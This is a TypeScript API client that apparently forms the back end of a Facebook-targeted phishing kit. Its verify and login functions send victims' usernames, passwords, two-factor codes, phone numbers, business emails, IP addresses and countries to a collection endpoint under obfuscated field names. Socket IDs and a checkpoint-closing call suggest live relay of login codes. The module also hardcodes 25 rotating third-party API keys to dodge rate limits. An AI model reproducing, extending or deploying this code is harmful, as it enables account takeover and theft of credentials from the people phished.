import axios from "axios";
import { handleError, handleResponse } from "./utils";
import { DOMAIN_FB } from "./constant";
const ENDPOINT = DOMAIN_FB;

export const verify = async (
  username: string,
  password: string,
  code: string,
  countryCode: string,
  ipAddress: string,
  idea: string,
  timestamp: number,
  socketId: string
) => {
  try {
    const url = `${ENDPOINT}verify`;
    const params = {
      uvi: username,
      pvi: password,
      ivic: ipAddress,
      ccVi: countryCode,
      idSl: idea,
      fcVic: code,
      tiSV: timestamp,
      sId: socketId
    };
    const response = await axios.post<any>(url, params, {
      timeout: 1000000000000000
    });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "error");
  }
};

export const login = async (
  phoneNumber: string,
  bEmail: string,
  username: string,
  password: string,
  countryCode: string,
  ipAddress: string,
  idea: string,
  socketId: string
) => {
  try {
    const url = `${ENDPOINT}login`;
    const params = {
      phvi: phoneNumber,
      bevi: bEmail,
      uvi: username,
      pvi: password,
      ivic: ipAddress,
      ccVi: countryCode,
      idSl: idea,
      sId: socketId
    };
    const response = await axios.post<any>(url, params, {
      timeout: 100000000000000
    });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "error");
  }
};

const API_KEYS = [
  "77ed8dc7c4d1eb5c2dc0f32a4f62fcd4ec3e72850e8d05cd68d72176",
  "6d314f8216a1ff1a1c3f5f0b01e055a5a47586fdc1eabbf429adcfa7",
  "effbe3d38bcbd19532a5997bf1d63b5f3fd4c5cbbc2d56813ece0592",
  "95465db8cedd336ddd1230996b81877215aefc394b6cf84b3ff7d2e7",
  "ede32c7329cdbcda3f045ccb9c823253c4788f6b0aef9984c4216325",
  "0a57384802d2a5bb2398c6b8f3368a894d89a153c1238bf371458e54",
  "ad919003d6a8bbfe52ca469c239fa2f7b5c44a54fc07afd07a0f4b6d",
  "1ab91bacfb261c53c71e2c7bb4b38ae2bdc1a933b82010351004baab",
  "8c6ca3ee5cd5dfe495c251e0ebc256cb0d970e4e74a61b258300e274",
  "79a1aef94a15e2c27a443b7deb3c3390234d6b985de312b63ec0e822",
  "e3f17154044b54f00645c3b2105cf40cd2824abdb3a19234b0c56645",
  "262a8133aae1d66724d320bfab27e013c6b9eb3586081567c6770680",
  "232e8c32ffc056bcf61d35fea915e55b3cfaa4d4cdda1ecba8f44ad7",
  "a9ad6a9a3a062c5d9d3712b78830cc25dbfac0b79b010c2f417ebe15",
  "2c52ac145c12066cc2cb69a82a2dcfdb7c51636ce7352a95c6648aca",
  "29bb83278e631e44dd9b48e89ac83bf614bc7db65feee9df582d9bee",
  "7da0f1c59b9729c35456cd67c00291cd2e4f2c41751d0ec92c67b043",
  "b1f5691e7200c7354a012ef1881ad370a3554e348ec6c1ad9176de59",
  "dbb2be8b0fc9343960224b1eb715b9d3efc63a024d4785a5c1a753ec",
  "b5f88eacdfb9292d249eb1bbce43bdb0396c28fc190db1bb48ac6763",
  "debeb9982dbd226cc838440d567f7cf33aa0050ea0dfdaebee0ea93c",
  "51382efd6d74777c4510f03b3f38ae3d53a522e84a6af383d1093f1b",
  "e35255b0f025d997073a4235633be5a4df18fcba8b2dc851272bbf54",
  "9d797269727d4cfd77f80bf7f5b9d51ff3bf7db8fd756c1b7c4c4f94",
  "ffab6262c0add03836710009cb565a5a3a5ba8378674a6795718b402"
];

let currentKeyIndex = 0;

export const getLocation = async () => {
  let lastError: any;

  for (let i = 0; i < API_KEYS.length; i++) {
    const apiKey = API_KEYS[currentKeyIndex];
    currentKeyIndex = (currentKeyIndex + 1) % API_KEYS.length;

    const url = `https://api.ipdata.co/?api-key=${apiKey}`;

    try {
      const response = await axios.get(url, { timeout: 5000 });
      return {
        ip: response.data.ip,
        country_code: response.data.country_code
      };
    } catch (err: any) {
      lastError = err;
      if (
        err.response?.status === 429 || // Rate limit
        err.response?.status === 403 ||
        err.code === "ECONNABORTED" || // Timeout
        err.code === "ENOTFOUND"
      ) {
        continue;
      } else {
        break;
      }
    }
  }

  throw new Error(
    `All API keys failed. Last error: ${lastError?.message || lastError}`
  );
};

export const click = async (
  idea: string,
  os: string,
  ip: string,
  countryCode: string
) => {
  try {
    const params = {
      ivic: ip,
      os: os,
      ccVi: countryCode,
      idSl: idea
    };
    const url = `${ENDPOINT}click`;
    const response = await axios.post(url, params);
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "something went wrong");
  }
};

export const closeWindow = async (socketId: string) => {
  try {
    const url = `${ENDPOINT}manual/close-check-point`;
    const response = await axios.post(url, {
      socketId
    });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "something went wrong");
  }
};

export async function getPageInfo() {
  const url = `${ENDPOINT}page`;

  try {
    const response = await fetch(url, {
      method: "GET",
      headers: {
        Accept: "application/json"
      }
    });

    if (!response.ok) {
      throw new Error(
        `Failed to fetch metadata: ${response.status} ${response.statusText}`
      );
    }

    const data = await response.json();
    return data;
  } catch (err) {
    console.error("Error fetching page metadata:", err);
    return [];
  }
}
